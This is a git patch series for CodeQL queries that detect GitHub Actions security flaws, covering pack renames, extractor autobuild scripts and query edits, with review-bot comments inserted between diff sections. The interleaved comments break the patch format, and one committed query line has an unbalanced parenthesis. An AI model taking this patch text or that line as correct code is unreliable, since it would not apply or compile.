@@ -0,0 +1,11 @@ +| .github/workflows/test1.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test1.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test1.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test1.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test1.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test1.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:94:13:94:121 | ${{ con ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test1.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref new file mode 100644 index 000000000000..f12135bd1b88 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql From 4f62573d1778a07a4dd8ff86510ca66ba6f24c15 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 10:11:52 +0100 Subject: [PATCH 663/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d34dad6665c8..a7df1c400bfc 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.84 +version: 0.1.85 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 007c2ebbe95d..96ba98407850 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.84 +version: 0.1.85 groups: [actions, queries] suites: codeql-suites extractor: javascript From ae6856ab5a2d1b775e16859b3f0146b6496578d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 14:44:13 +0100 Subject: [PATCH 664/707] models: add new control check model --- ql/lib/codeql/actions/security/ControlChecks.qll | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index a24fd44b8650..244c04310d6d 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -267,6 +267,13 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { + this.getCallee() = "actions-cool/check-user-permission" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("require") = ["write", "admin"] + ) + or this.getCallee() = "sushichop/action-repository-permission" and this.getArgument("required-permission") = ["write", "admin"] or From 5bf02e73ea2ab7cc8e12ef8fd784df1a183f007a Mon Sep 17 00:00:00 2001 
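Review bot: The new `actions-cool/check-user-permission` model in `PermissionActionCheck` tests two different input names: the first disjunct asks whether `permission-level` is absent, while the second reads `require`. If the action's input is in fact called `require`, as the second disjunct assumes, no step ever sets `permission-level`, so the first disjunct holds for every use and a step with `require: read` is still classified as a write/admin permission check, which weakens the control-check model. The comment `// default permission level is write` should then be paired with the same input: `not exists(this.getArgument("require")) or`. The characteristic predicate continues outside the hunk.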
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Mon, 4 Nov 2024 11:30:29 -0500 Subject: [PATCH 665/707] Update ql/src/Security/CWE-829/UnpinnedActionsTag.ql MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 10c21bc368b5..95498d6be5ab 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) + repo.matches(["actions", "github", "advanced-security"] + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From 686e30a52a65d6a83e532cd6c8ece34849938ad3 Mon Sep 17 00:00:00 2001 From: Brandon Stewart <20469703+boveus@users.noreply.github.com> Date: Wed, 6 Nov 2024 20:20:26 +0000 Subject: [PATCH 666/707] add qlhelp --- .../CodeQL/UnnecessaryUseOfAdvancedConfig.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md new file mode 100644 index 000000000000..21a56e8d84d6 --- /dev/null +++ b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md 
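Review bot: The replacement line in `isTrustedOrg` has one more closing parenthesis than opening ones — `repo.matches([...] + "/%"))` opens one `(` and closes two — so, assuming the line is rendered faithfully here, the query will not compile as committed; `repo.matches(["actions", "github", "advanced-security"] + "/%")` is the balanced form. The set-valued `+` does express the same disjunction as the removed `exists`, so the simplification itself is sound. The `from` line that follows belongs to the query body, which continues outside the hunk.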
@@ -0,0 +1,13 @@ +# Unneccesary use of advanced configuration + +## Description + +The CodeQL workflow does not use any custom settings and could be simplified by switching to the CodeQL default setup. + +## Recommendations + +If there is no reason to have a custom configuration switch to the CodeQL default setup. + +## References + +- [GitHub Docs: Configuring Default Setup for a repository](https://docs.github.com/en/code-security/code-scanning/enabling-code-scanning/configuring-default-setup-for-code-scanning#configuring-default-setup-for-a-repository) \ No newline at end of file From 99a49fb27fac14f93c8fb6848ebbbef8a4c6e799 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 10:43:05 -0500 Subject: [PATCH 667/707] Move packs to `codeql` org --- BUILD.bazel | 20 ++++++++++++++ extractor/BUILD.bazel | 10 +++++++ extractor/codeql-extractor.yml | 44 ++++++++++++++++++++++++++++++ extractor/tools/autobuild-impl.ps1 | 40 +++++++++++++++++++++++++++ extractor/tools/autobuild.cmd | 3 ++ extractor/tools/autobuild.sh | 39 ++++++++++++++++++++++++++ ql/lib/qlpack.yml | 8 +++--- ql/src/codeql-pack.lock.yml | 22 +++++++++++---- ql/src/qlpack.yml | 6 ++-- ql/test/qlpack.yml | 10 +++---- 10 files changed, 184 insertions(+), 18 deletions(-) create mode 100644 BUILD.bazel create mode 100644 extractor/BUILD.bazel create mode 100644 extractor/codeql-extractor.yml create mode 100644 extractor/tools/autobuild-impl.ps1 create mode 100644 extractor/tools/autobuild.cmd create mode 100644 extractor/tools/autobuild.sh diff --git a/BUILD.bazel b/BUILD.bazel new file mode 100644 index 000000000000..643d40897185 --- /dev/null +++ b/BUILD.bazel @@ -0,0 +1,20 @@ +load("//misc/bazel:pkg.bzl", "codeql_pack") + +package(default_visibility = ["//visibility:public"]) + +[ + codeql_pack( + name = "-".join(parts), + srcs = [ + "//actions/extractor", + ], + pack_prefix = "/".join(parts), + ) + for parts in ( + [ + "experimental", + "actions", + ], + ["actions"], + ) +] 
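Review bot: The new root `BUILD.bazel` loads `//misc/bazel:pkg.bzl` and lists `//actions/extractor` as a source, both of which appear to resolve only when this repository is checked out as the `actions/` directory of the CodeQL monorepo; built stand-alone from this repository the targets cannot be found. A one-line comment at the top stating that assumption, e.g. `# Built from the CodeQL monorepo, where this repository is mounted at //actions.`, would spare the next reader a failed build.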
diff --git a/extractor/BUILD.bazel b/extractor/BUILD.bazel new file mode 100644 index 000000000000..e6780e10db2a --- /dev/null +++ b/extractor/BUILD.bazel @@ -0,0 +1,10 @@ +load("//misc/bazel:pkg.bzl", "codeql_pkg_files", "strip_prefix") + +codeql_pkg_files( + name = "extractor", + srcs = [ + "codeql-extractor.yml", + ] + glob(["tools/**"]), + strip_prefix = strip_prefix.from_pkg(), + visibility = ["//actions:__pkg__"], +) diff --git a/extractor/codeql-extractor.yml b/extractor/codeql-extractor.yml new file mode 100644 index 000000000000..ab7374910054 --- /dev/null +++ b/extractor/codeql-extractor.yml @@ -0,0 +1,44 @@ +name: "actions" +aliases: [] +display_name: "GitHub Actions" +version: 0.0.1 +column_kind: "utf16" +unicode_newlines: true +build_modes: + - none +file_coverage_languages: [] +github_api_languages: [] +scc_languages: [] +file_types: + - name: workflow + display_name: GitHub Actions workflow files + extensions: + - .yml + - .yaml +forwarded_extractor_name: javascript +options: + trap: + title: TRAP options + description: Options about how the extractor handles TRAP files + type: object + visibility: 3 + properties: + cache: + title: TRAP cache options + description: Options about how the extractor handles its TRAP cache + type: object + properties: + dir: + title: TRAP cache directory + description: The directory of the TRAP cache to use + type: string + bound: + title: TRAP cache bound + description: A soft limit (in MB) on the size of the TRAP cache + type: string + pattern: "[0-9]+" + write: + title: TRAP cache writeable + description: Whether to write to the TRAP cache as well as reading it + type: string + pattern: "(true|TRUE|false|FALSE)" diff --git a/extractor/tools/autobuild-impl.ps1 b/extractor/tools/autobuild-impl.ps1 new file mode 100644 index 000000000000..6ae433f2599c --- /dev/null +++ b/extractor/tools/autobuild-impl.ps1 
@@ -0,0 +1,40 @@
+if (($null -ne $env:LGTM_INDEX_INCLUDE) -or ($null -ne $env:LGTM_INDEX_EXCLUDE) -or ($null -ne $env:LGTM_INDEX_FILTERS)) {
+ Write-Output 'Path filters set. Passing them through to the JavaScript extractor.'
+} else {
+ Write-Output 'No path filters set. Using the default filters.'
+ $DefaultPathFilters = @(
+ 'exclude:**/*',
+ 'include:.github/workflows/**/*.yml',
+ 'include:.github/workflows/**/*.yaml',
+ 'include:**/action.yml',
+ 'include:**/action.yaml'
+ )
+
+ $env:LGTM_INDEX_FILTERS = $DefaultPathFilters -join "`n"
+}
+
+# Find the JavaScript extractor directory via `codeql resolve extractor`.
+$CodeQL = Join-Path $env:CODEQL_DIST 'codeql.exe'
+$env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT = &$CodeQL resolve extractor --language javascript
+if ($LASTEXITCODE -ne 0) {
+ throw 'Failed to resolve JavaScript extractor.'
+}
+
+Write-Output "Found JavaScript extractor at '${env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}'."
+
+# Run the JavaScript autobuilder.
+$JavaScriptAutoBuild = Join-Path $env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT 'tools\autobuild.cmd'
+Write-Output "Running JavaScript autobuilder at '${JavaScriptAutoBuild}'."
+
+# Copy the values of the Actions extractor environment variables to the JavaScript extractor environment variables.
+$env:CODEQL_EXTRACTOR_JAVASCRIPT_DIAGNOSTIC_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_DIAGNOSTIC_DIR
+$env:CODEQL_EXTRACTOR_JAVASCRIPT_LOG_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_LOG_DIR
+$env:CODEQL_EXTRACTOR_JAVASCRIPT_SCRATCH_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_SCRATCH_DIR
+$env:CODEQL_EXTRACTOR_JAVASCRIPT_SOURCE_ARCHIVE_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_SOURCE_ARCHIVE_DIR
+$env:CODEQL_EXTRACTOR_JAVASCRIPT_TRAP_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_TRAP_DIR
+$env:CODEQL_EXTRACTOR_JAVASCRIPT_WIP_DATABASE = $env:CODEQL_EXTRACTOR_ACTIONS_WIP_DATABASE
+
+&$JavaScriptAutoBuild
+if ($LASTEXITCODE -ne 0) {
+ throw "JavaScript autobuilder failed."
+}
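Review bot: `Join-Path $env:CODEQL_DIST 'codeql.exe'`, on the line after the `# Find the JavaScript extractor` comment, is not guarded against `CODEQL_DIST` being unset; with a null path `Join-Path` raises a binding error that does not name the missing variable, and under the default error preference the script may carry on with an empty `$CodeQL` until the `&$CodeQL` call fails, whereas the sibling `autobuild.sh` aborts immediately under `set -eu`. A guard before it, `if (-not $env:CODEQL_DIST) { throw 'CODEQL_DIST is not set.' }`, gives the same early, readable failure on Windows.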
diff --git a/extractor/tools/autobuild.cmd b/extractor/tools/autobuild.cmd
new file mode 100644
index 000000000000..ff5ca89d94a4
--- /dev/null
+++ b/extractor/tools/autobuild.cmd
@@ -0,0 +1,3 @@
+@echo off
+rem All of the work is done in the PowerShell script
+powershell.exe %~dp0autobuild-impl.ps1
diff --git a/extractor/tools/autobuild.sh b/extractor/tools/autobuild.sh
new file mode 100644
index 000000000000..57adbf96279d
--- /dev/null
+++ b/extractor/tools/autobuild.sh
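Review bot: `powershell.exe %~dp0autobuild-impl.ps1` passes the script path unquoted, so an extractor installed under a directory whose name contains a space breaks the invocation, and the call also inherits the user's profile and the machine's execution policy, which can alter or block a script the extractor relies on. `powershell.exe -NoProfile -ExecutionPolicy Bypass -File "%~dp0autobuild-impl.ps1"` runs the script in a fixed environment and still propagates its exit code to the caller.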
@@ -0,0 +1,39 @@
+#!/bin/sh
+
+set -eu
+
+DEFAULT_PATH_FILTERS=$(cat << END
+exclude:**/*
+include:.github/workflows/**/*.yml
+include:.github/workflows/**/*.yaml
+include:**/action.yml
+include:**/action.yaml
+END
+)
+
+if [ -n "${LGTM_INDEX_INCLUDE:-}" ] || [ -n "${LGTM_INDEX_EXCLUDE:-}" ] || [ -n "${LGTM_INDEX_FILTERS:-}" ] ; then
+ echo "Path filters set. Passing them through to the JavaScript extractor."
+else
+ echo "No path filters set. Using the default filters."
+ LGTM_INDEX_FILTERS="${DEFAULT_PATH_FILTERS}"
+ export LGTM_INDEX_FILTERS
+fi
+
+# Find the JavaScript extractor directory via `codeql resolve extractor`.
+CODEQL_EXTRACTOR_JAVASCRIPT_ROOT="$($CODEQL_DIST/codeql resolve extractor --language javascript)"
+export CODEQL_EXTRACTOR_JAVASCRIPT_ROOT
+
+echo "Found JavaScript extractor at '${CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}'."
+
+# Run the JavaScript autobuilder
+JAVASCRIPT_AUTO_BUILD="${CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}/tools/autobuild.sh"
+echo "Running JavaScript autobuilder at '${JAVASCRIPT_AUTO_BUILD}'."
+
+# Copy the values of the Actions extractor environment variables to the JavaScript extractor environment variables.
+env CODEQL_EXTRACTOR_JAVASCRIPT_DIAGNOSTIC_DIR="${CODEQL_EXTRACTOR_ACTIONS_DIAGNOSTIC_DIR}" \
+ CODEQL_EXTRACTOR_JAVASCRIPT_LOG_DIR="${CODEQL_EXTRACTOR_ACTIONS_LOG_DIR}" \
+ CODEQL_EXTRACTOR_JAVASCRIPT_SCRATCH_DIR="${CODEQL_EXTRACTOR_ACTIONS_SCRATCH_DIR}" \
+ CODEQL_EXTRACTOR_JAVASCRIPT_SOURCE_ARCHIVE_DIR="${CODEQL_EXTRACTOR_ACTIONS_SOURCE_ARCHIVE_DIR}" \
+ CODEQL_EXTRACTOR_JAVASCRIPT_TRAP_DIR="${CODEQL_EXTRACTOR_ACTIONS_TRAP_DIR}" \
+ CODEQL_EXTRACTOR_JAVASCRIPT_WIP_DATABASE="${CODEQL_EXTRACTOR_ACTIONS_WIP_DATABASE}" \
+ ${JAVASCRIPT_AUTO_BUILD}
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index a7df1c400bfc..823e6a76cbc2 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
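Review bot: Two path expansions in the new `autobuild.sh` are unquoted and will word-split on a CodeQL distribution or extractor directory that contains a space: `$CODEQL_DIST` inside the command substitution on the `CODEQL_EXTRACTOR_JAVASCRIPT_ROOT=` line, and `${JAVASCRIPT_AUTO_BUILD}` as the final argument of the `env` command. `CODEQL_EXTRACTOR_JAVASCRIPT_ROOT="$("$CODEQL_DIST"/codeql resolve extractor --language javascript)"` and `"${JAVASCRIPT_AUTO_BUILD}"` keep each as a single word; `set -eu` already makes an unset `CODEQL_DIST` or `CODEQL_EXTRACTOR_ACTIONS_*` variable a hard failure, which is the right default for an extractor entry point. Everything else in the script is correctly quoted.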
@@ -1,16 +1,16 @@
 ---
 library: true
 warnOnImplicitThis: true
-name: github/actions-all
+name: codeql/actions-all
 version: 0.1.85
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
 codeql/controlflow: ^1.0.1
 codeql/dataflow: ^1.0.1
-extractor: javascript
-dbscheme: semmlecode.javascript.dbscheme
-groups: javascript
+ codeql/javascript-all: ^2.0.2
+extractor: actions
+groups: actions
 dataExtensions:
 - ext/manual/*.model.yml
 - ext/generated/**/*.model.yml
diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml
index 21e0b8bb0e91..c4ef87bc2512 100644
--- a/ql/src/codeql-pack.lock.yml
+++ b/ql/src/codeql-pack.lock.yml
@@ -2,15 +2,25 @@
 lockVersion: 1.0.0
 dependencies:
 codeql/controlflow:
- version: 1.0.1
+ version: 1.0.10
 codeql/dataflow:
- version: 1.0.1
+ version: 1.1.4
+ codeql/javascript-all:
+ version: 2.0.2
+ codeql/mad:
+ version: 1.0.10
+ codeql/regex:
+ version: 1.0.10
 codeql/ssa:
- version: 1.0.1
+ version: 1.0.10
+ codeql/tutorial:
+ version: 1.0.10
 codeql/typetracking:
- version: 1.0.1
+ version: 1.0.10
 codeql/util:
- version: 1.0.1
+ version: 1.0.10
+ codeql/xml:
+ version: 1.0.10
 codeql/yaml:
- version: 1.0.1
+ version: 1.0.10
 compiled: false
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 96ba98407850..c907bbab1d0a 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,11 +1,11 @@
 ---
 library: false
-name: github/actions-queries
+name: codeql/actions-queries
 version: 0.1.85
 groups: [actions, queries]
 suites: codeql-suites
-extractor: javascript
+extractor: actions
 defaultSuiteFile: codeql-suites/actions-code-scanning.qls
 dependencies:
- github/actions-all: ${workspace}
+ codeql/actions-all: ${workspace}
 warnOnImplicitThis: true
diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml
index 77e25d8e419c..893532481eca 100644
--- a/ql/test/qlpack.yml
+++ b/ql/test/qlpack.yml
@@ -1,10 +1,10 @@ --- -name: github/actions-tests -groups: [javascript, test] +name: codeql/actions-tests +groups: [codeql, test] dependencies: - github/actions-all: ${workspace} - github/actions-queries: ${workspace} -extractor: javascript + codeql/actions-all: ${workspace} + codeql/actions-queries: ${workspace} +extractor: actions tests: . warnOnImplicitThis: true From b2100d00aa091c9cbda89803f5d3e216ed2d4cfc Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 11:15:34 -0500 Subject: [PATCH 668/707] Add `security-and-quality` suite --- ql/src/codeql-suites/actions-security-and-quality.qls | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 ql/src/codeql-suites/actions-security-and-quality.qls diff --git a/ql/src/codeql-suites/actions-security-and-quality.qls b/ql/src/codeql-suites/actions-security-and-quality.qls new file mode 100644 index 000000000000..ef332acb872c --- /dev/null +++ b/ql/src/codeql-suites/actions-security-and-quality.qls @@ -0,0 +1,11 @@ +- description: Security-and-quality queries for Actions +- queries: '.' +- include: + problem.severity: + - error + - recommendation +- exclude: + tags contain: + - experimental + - debug + From 1f3bab2b65934888d9b6323df6f1848003222671 Mon Sep 17 00:00:00 2001 
From: Dave Bartolomeo Date: Thu, 7 Nov 2024 11:15:52 -0500 Subject: [PATCH 669/707] Move data extensions to use `codeql` org --- ql/lib/codeql-pack.lock.yml | 22 ++++++++++++++----- .../ext/config/argument_injection_sinks.yml | 2 +- ql/lib/ext/config/context_event_map.yml | 2 +- .../config/externally_triggereable_events.yml | 2 +- ql/lib/ext/config/poisonable_steps.yml | 6 ++--- .../ext/config/untrusted_event_properties.yml | 2 +- ql/lib/ext/config/untrusted_gh_command.yml | 2 +- ql/lib/ext/config/untrusted_git_command.yml | 2 +- ql/lib/ext/config/vulnerable_actions.yml | 2 +- ql/lib/ext/config/workflow_runtime_data.yml | 4 ++-- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- 
.../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- 
...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- 
.../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 ++-- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 ++-- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 ++-- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- 
